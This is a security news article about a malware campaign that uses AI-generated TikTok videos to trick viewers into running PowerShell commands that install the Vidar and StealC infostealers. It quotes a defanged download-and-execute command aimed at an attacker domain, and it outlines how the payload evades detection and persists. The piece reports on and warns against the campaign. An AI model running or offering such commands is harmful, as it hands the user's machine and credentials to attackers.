Recent investigations have revealed a concerning new trend: threat actors are exploiting TikTok’s massive reach to distribute information-stealing malware, including notorious strains such as Vidar and StealC.
This campaign cleverly utilizes AI-generated videos to deceive users into executing malicious PowerShell commands, presenting them as legitimate software activation steps.
Security researchers have identified a sophisticated social engineering campaign exploiting TikTok’s algorithm. Attackers create faceless, AI-generated videos instructing users to activate popular software such as Windows, Microsoft Office, CapCut, and Spotify.
These videos, some with over 500,000 views, guide viewers to open PowerShell and execute commands that download and run scripts from suspicious websites.
For example, one common instruction is to type:
textiex (irm hxxps://allaivo[.]me/spotify)
This command downloads a remote script, which then orchestrates a multi-stage attack.
The script creates hidden directories in the user’s APPDATA and LOCALAPPDATA folders, adds these locations to the Windows Defender exclusion list to evade detection, and downloads a secondary payload identified as either Vidar or StealC malware from a remote server.
The malware is then executed as a hidden, elevated process, and persistence is established via registry keys to ensure the malicious script runs at startup.
The attackers use a range of URLs and IPs for their command-and-control (C&C) infrastructure, including:
Vidar malware, in particular, abuses legitimate services like Steam and Telegram as “dead drop resolvers,” embedding C&C server information within public profiles to avoid detection.
The campaign’s scale is amplified by the use of AI-generated content, enabling attackers to produce and tailor videos for different audiences rapidly.
The shift to social media as a malware delivery mechanism poses significant challenges for traditional security controls.
Since malicious instructions are delivered visually and aurally within video content, rather than as executable code, standard detection tools may miss these threats.
Businesses and individuals are vulnerable to data exfiltration, credential theft, and system compromise.
To mitigate these risks, experts recommend:
Security platforms like Trend Vision One™ offer advanced detection and hunting capabilities, but the most effective defense remains a combination of technical controls and user education.
As threat actors continue to exploit popular platforms, vigilance and proactive security measures are crucial for staying safe in an increasingly complex digital landscape.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…